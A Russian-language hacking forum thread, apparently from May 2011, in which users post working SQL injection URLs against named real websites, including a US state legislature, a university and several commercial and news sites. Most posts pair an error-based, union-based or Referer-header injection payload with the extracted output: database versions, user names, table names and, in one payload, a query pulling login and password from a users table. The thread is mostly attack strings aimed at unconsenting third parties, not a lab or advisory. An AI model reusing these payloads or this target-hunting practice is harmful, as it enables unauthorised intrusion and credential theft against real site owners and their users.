 |
|
05.05.2011, 23:03
|
|
Новичок
Регистрация: 04.05.2011
Сообщений: 10
С нами:
7908086
Репутация:
10
|
|
Ситуация: пробельные символы попадают без юрлдекодирования в запрос + однострочным комментом запрос не отсечь.
Решение(замена пробельного символа, вывод в ошибке и закрытие ковычки, вместо ее отсечения):
Код:
http://www.vw-axsel.ru/catalog/tiguan/'/**/and(1)IN(select/**/1/**/from(select/**/count(*),concat(version(),floor(rand(0)*2))from(information_schema.tables)group/**/by/**/2)a)and'
|
|
|
07.05.2011, 00:35
|
|
Участник форума
Регистрация: 19.12.2010
Сообщений: 155
С нами:
8103926
Репутация:
85
|
|
http://cakerysupplies.com/ : PR 4
Тип БД: МS ACCESS
Имя БД:cakery
Эксплойт
Сообщение от None
http://cakerysupplies.com/store/WsDefault.asp?One=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48, 49,50,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,3 5,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,1,2 ,3,4,5,6,7,8+from+products
По ходу принтабельных столбцов не нашлось, крутить по типу блайнl не было смысла - БД как я понял служит только для обеспечения информацией о товарах, следовательно никаких паролей и юзеров там нет |
|
|
|
07.05.2011, 00:36
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
pr:5 тиц:350
Сообщение от None
http://www.uni.ru/articles.php?action=show&id=-43+union+select+1,2,3,concat_ws(0x3a,login,passwor d),5,6,7,8,9+from+users--
Сообщение от None
http://infosfera.sfo.ru/a/articles.php?cat_id=&id=550+union+select+1,2,3,4,c oncat_ws(0x3a,user(),version(),database()),6,7,8,9--
infosfera@localhost:4.0.24_Debian-10sarge3-log:infosfera
pr:5
Сообщение от None
http://old.cageprisoners.com/articles.php?id=-14677+union+select+1,2,concat_ws(0x3a,version(),us er(),database()),4,5,6--
5.0.84:cagepris_user@localhost:cagepris_cms
|
|
|
|
07.05.2011, 00:53
|
|
Участник форума
Регистрация: 19.12.2010
Сообщений: 155
С нами:
8103926
Репутация:
85
|
|
Законодательная Власть Штата Аризона
http://www.az[ZZZ]leg. gov : PR 6
Тип БД:Microsoft SQL Server 2005 - 9.00.4053.00 (Intel X86) May 26 2009 14:24:20 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
Имя БД:Status
Имя пользователя БД:webuser
Эксплойт
Сообщение от None
http://www.az[ZZZ]leg.gov/DocumentsForBill.asp?Bill_Number=1%27+or+1=%28SELE CT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES +WHERE+TABLE_NAME+NOT+IN+%28%27Committee_Actions%2 7%29%29--
Таблицы
Сообщение от None
Committee_Actions
Committee_Members
хочешь еще? - добывай сам!
|
|
|
|
07.05.2011, 01:56
|
|
Новичок
Регистрация: 04.05.2011
Сообщений: 10
С нами:
7908086
Репутация:
10
|
|
Ситуация: вывод через двойной запрос
Решение:
Код:
http://mindlessgaming.com/?page=match&action=view&match_id=1'and(0)union select " 1'and(0)union select 1,version(),3,4,5,user(),7,8,9,10,11,12,13,14-- -"-- -
|
|
|
|
07.05.2011, 12:53
|
|
Новичок
Регистрация: 29.06.2007
Сообщений: 18
С нами:
9930159
Репутация:
17
|
|
Код:
http://www.soundtrackcovers.ru/catalogue.php?id=671-999.9+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
4.1.25
Код:
http://www.finances-pedagogie.fr/pages/publications.php?id=34-999.9+union+select+1,2,version(),4,5,6--
4.0.27-max-log
Pr 5
Код:
http://www.lavallart-associes.com/texte_publications.php?id=49-999.9+union+select+1,2,3,4,5,6,7,version()--
5.1.41-3ubuntu12
Код:
http://www.avance-org.fr/publications/publications.php?idFamille=2-999.9+union+select+1,2,3,4,5,6,version()--
5.0.32-Debian_7etch12-log |
|
|
|
07.05.2011, 23:13
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
С нами:
9384053
Репутация:
303
|
|
Заметно, что на сайте присутствует гей - тематика....
http://www.bayareareporter.org/news/article.php?sec=news&article=-5000+union+select+1,table_name,3,4,5,6,7,8,9,10,1, 2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7+from+information_ schema.columns+where+column_name+like+%22%login%%2 2+limit+0,1--+
|
|
|
|
08.05.2011, 01:24
|
|
Новичок
Регистрация: 04.05.2011
Сообщений: 10
С нами:
7908086
Репутация:
10
|
|
Ситуация: инъекция в рефере, в инсерт запросе, вывод в ошибке.
Решение:
Код:
http://74auc.ru/index.php
referer: asd')on duplicate key update a=(select 1 from(select name_const(version(),1),name_const(version(),1))a)-- -
|
|
|
|
09.05.2011, 22:37
|
|
Постоянный
Регистрация: 17.04.2011
Сообщений: 638
С нами:
7932566
Репутация:
81
|
|
http://faraon.stfaraon.ru/site.php?id=30065+and+1=0+union+select+1,group_con cat%28table_name+separator+0x3a%29,3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+fro m+information_schema.tables+where+table_schema=0x6 66172616f6e7374666172616f6e--
|
|
|
|
10.05.2011, 19:02
|
|
Новичок
Регистрация: 07.05.2010
Сообщений: 6
С нами:
8428329
Репутация:
0
|
|
edu
Код:
http://art.colorado.edu/hiaff/section.php?id=-4+union+select+1,2,3,4,group_concat%280x0b,table_name%29,6,7+from+information_schema.tables+--
pr6
Код:
http://www.adas-fusion.eu/theme.php?id=-3+union+select+1,2,3,group_concat%280x0b,table_name%29,5,6+from+information_schema.tables+--
pr5
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [RedSky]](/avatars/avatar162265.jpg?2665614){kind=avatar}
![Аватар для [RedSky]](/avatars/avatar162265.jpg?2667357){kind=avatar}
![Аватар для [RedSky]](/avatars/avatar162265.jpg?2668823){kind=avatar}
Линейный вид
